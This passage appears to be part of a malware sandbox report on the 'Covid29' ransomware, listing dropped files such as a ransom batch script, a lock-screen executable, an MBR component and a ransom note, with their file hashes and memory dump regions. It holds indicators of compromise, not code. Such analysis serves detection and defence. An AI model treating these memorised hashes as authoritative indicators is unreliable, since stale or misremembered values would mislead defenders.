                                                                                                      fd60e991c2b3e398245b172ac18ce43035cfdccf172ee1f9b552d9f799e698fe

                                                                                                      SHA512

                                                                                                      7a3180a61eac98cb10146a177bbb95e94e816da3c048ed1ef241ca39eaa32191b189e0124d78710b652d46d1236f0ed978dce90d0c49fe570fc7a766d0c67e8d

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                                      Filesize

                                                                                                      94KB

                                                                                                      MD5

                                                                                                      3820b6d1eb7acf1d920d962af41d5f87

                                                                                                      SHA1

                                                                                                      e82feb2b3d42e375771e9aba73ac53b40f022903

                                                                                                      SHA256

                                                                                                      67b952a593eb66162f524f1669a78ebdd135f444f5f595c36222e4c9d4772757

                                                                                                      SHA512

                                                                                                      96f6f663376193bf74cd9bdc6840309ff5b3ceb59b469aaef0c36c88dd24e836b4037dc9eebbb57b763b1bdfa2eff6f8ce7568b92d6ed7b774828b6f06489b4e

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                                      Filesize

                                                                                                      100KB

                                                                                                      MD5

                                                                                                      5ce0c779c0957df6907467d1c6d0ba5d

                                                                                                      SHA1

                                                                                                      8f12524cfa50359ef5ba05921749d312c8e1e8b1

                                                                                                      SHA256

                                                                                                      82aa1c6fe8e5ae04e114d4134a4e988851bdeb0b6f0d1608c05ed75740b1c786

                                                                                                      SHA512

                                                                                                      31e2f88e9db7628697cfdfb03732edc809b72d7a11406b9620f2c331d9b08668a71c61faabb45d5879e27a447b56bb7fb390a2a81dedd0c2770bfa0314c61086

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58dc80.TMP

                                                                                                      Filesize

                                                                                                      88KB

                                                                                                      MD5

                                                                                                      83a45e12bb99487a080f69872a5d9c34

                                                                                                      SHA1

                                                                                                      2a300d5644871aecc54e28e0ba425891888c5cf2

                                                                                                      SHA256

                                                                                                      360c2a71a101b8ad4dc5c7ece9a0bf361933eba977f91dcde4da0b6a28c6eed6

                                                                                                      SHA512

                                                                                                      a32a1f20cc9502e1f59164e0243b7020d916e8c12c385af6524021a145d987f8be45ac21f1ff77bc4a1eb74c9bea6f0c8566628b10936d0732d47aca48018fa9

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ADA.tmp\Cov29Cry.exe.death

                                                                                                      Filesize

                                                                                                      103KB

                                                                                                      MD5

                                                                                                      8bcd083e16af6c15e14520d5a0bd7e6a

                                                                                                      SHA1

                                                                                                      c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                                                                      SHA256

                                                                                                      b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                                                                      SHA512

                                                                                                      35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ADA.tmp\Cov29LockScreen.exe

                                                                                                      Filesize

                                                                                                      48KB

                                                                                                      MD5

                                                                                                      f724c6da46dc54e6737db821f9b62d77

                                                                                                      SHA1

                                                                                                      e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                                                                      SHA256

                                                                                                      6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                                                                      SHA512

                                                                                                      6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ADA.tmp\TrojanRansomCovid29.bat

                                                                                                      Filesize

                                                                                                      1KB

                                                                                                      MD5

                                                                                                      57f0432c8e31d4ff4da7962db27ef4e8

                                                                                                      SHA1

                                                                                                      d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                                                                      SHA256

                                                                                                      b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                                                                      SHA512

                                                                                                      bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ADA.tmp\fakeerror.vbs

                                                                                                      Filesize

                                                                                                      144B

                                                                                                      MD5

                                                                                                      c0437fe3a53e181c5e904f2d13431718

                                                                                                      SHA1

                                                                                                      44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                                                                      SHA256

                                                                                                      f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                                                                      SHA512

                                                                                                      a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ADA.tmp\mbr.exe.danger

                                                                                                      Filesize

                                                                                                      1.3MB

                                                                                                      MD5

                                                                                                      35af6068d91ba1cc6ce21b461f242f94

                                                                                                      SHA1

                                                                                                      cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                                                                      SHA256

                                                                                                      9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                                                                      SHA512

                                                                                                      136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\DCA0.tmp\DCA1.bat

                                                                                                      Filesize

                                                                                                      72B

                                                                                                      MD5

                                                                                                      68b7b411b72e9dd415d3166e15afde77

                                                                                                      SHA1

                                                                                                      adce44aeba7c9793ed1d82c90c1659d9cca49ad5

                                                                                                      SHA256

                                                                                                      81dfa0d23106ef51fac23da58be3696cf84e0be15e3e6c22e0410741091ce892

                                                                                                      SHA512

                                                                                                      03e5071d96ca4e02c7209a19f053bb55d54ddaaa23198f888280761dc413a179dfb90908f1eb6db715f0e7a5479675f6a606f540e0fd93e0b19e1c4f7ee62cc5

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe

                                                                                                      Filesize

                                                                                                      474KB

                                                                                                      MD5

                                                                                                      914634831f03b7756db3cb09add84965

                                                                                                      SHA1

                                                                                                      0a7d3282f61c5b997f54ba2e9bab931962e8326f

                                                                                                      SHA256

                                                                                                      c65a6207582850522a078537a6adbd9fcc6fdd4fcf5ae1cb9b9bba1652fcf494

                                                                                                      SHA512

                                                                                                      14a64a030c78c3d76bb9bc4da1c215ae69813c03d7fe9a54faeb7777a790392ac29a31f36c1f3e47a034cbfaa6849a354e8eee7f88db3a1129fbf29bd03d88d0

                                                                                                    • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                                                                      Filesize

                                                                                                      861B

                                                                                                      MD5

                                                                                                      c53dee51c26d1d759667c25918d3ed10

                                                                                                      SHA1

                                                                                                      da194c2de15b232811ba9d43a46194d9729507f0

                                                                                                      SHA256

                                                                                                      dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                                                                      SHA512

                                                                                                      da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                                                                      Filesize

                                                                                                      1.7MB

                                                                                                      MD5

                                                                                                      272d3e458250acd2ea839eb24b427ce5

                                                                                                      SHA1

                                                                                                      fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                                                                      SHA256

                                                                                                      bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                                                                      SHA512

                                                                                                      d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                                                                    • C:\Users\Admin\Downloads\GuideLauncher.exe

                                                                                                      Filesize

                                                                                                      408KB

                                                                                                      MD5

                                                                                                      934b81faace8824b29105af62987af2a

                                                                                                      SHA1

                                                                                                      296d77ca6c3dac44ee95dd789f9dc1dc84ef3cef

                                                                                                      SHA256

                                                                                                      f95eaf4de259a6e73e86981895f45adc5660268740f34bfddf2d7b4f6a6d4b69

                                                                                                      SHA512

                                                                                                      a18b15f38b68b3134c55e314db47b6cee14b6910d7101384cdab53053c2a9c222d7ac70936663e74382cfe9808d6b9d9f893dc377cabbd2d953472f77d7ef246

                                                                                                    • C:\Users\Admin\Downloads\Unconfirmed 589024.crdownload

                                                                                                      Filesize

                                                                                                      21.5MB

                                                                                                      MD5

                                                                                                      ac9526ec75362b14410cf9a29806eff4

                                                                                                      SHA1

                                                                                                      ef7c1b7181a9dc4e0a1c6b3804923b58500c263d

                                                                                                      SHA256

                                                                                                      5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164

                                                                                                      SHA512

                                                                                                      29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

                                                                                                    • memory/1672-838-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/1672-828-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/1880-842-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/2148-800-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/2148-785-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/2224-835-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/2224-837-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/2224-821-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3056-659-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3056-793-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3092-647-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3092-797-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3376-635-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3376-792-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3488-698-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                      Filesize

                                                                                                      864KB

                                                                                                    • memory/3708-799-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3708-702-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3728-840-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/3932-805-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/4028-839-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/4028-836-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/4324-795-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/4460-794-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/4460-718-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/4472-699-0x0000000000790000-0x00000000007B0000-memory.dmp

                                                                                                      Filesize

                                                                                                      128KB

                                                                                                    • memory/4628-1238-0x0000000000400000-0x0000000001DFD000-memory.dmp

                                                                                                      Filesize

                                                                                                      26.0MB

                                                                                                    • memory/4628-1340-0x0000000000400000-0x0000000001DFD000-memory.dmp

                                                                                                      Filesize

                                                                                                      26.0MB

                                                                                                    • memory/4628-1342-0x0000000000400000-0x0000000001DFD000-memory.dmp

                                                                                                      Filesize

                                                                                                      26.0MB

                                                                                                    • memory/4956-798-0x0000000000400000-0x000000000047D000-memory.dmp

                                                                                                      Filesize

                                                                                                      500KB

                                                                                                    • memory/5052-666-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.8MB

                                                                                                    • memory/5052-719-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.8MB

                                                                                                    • memory/5052-724-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.8MB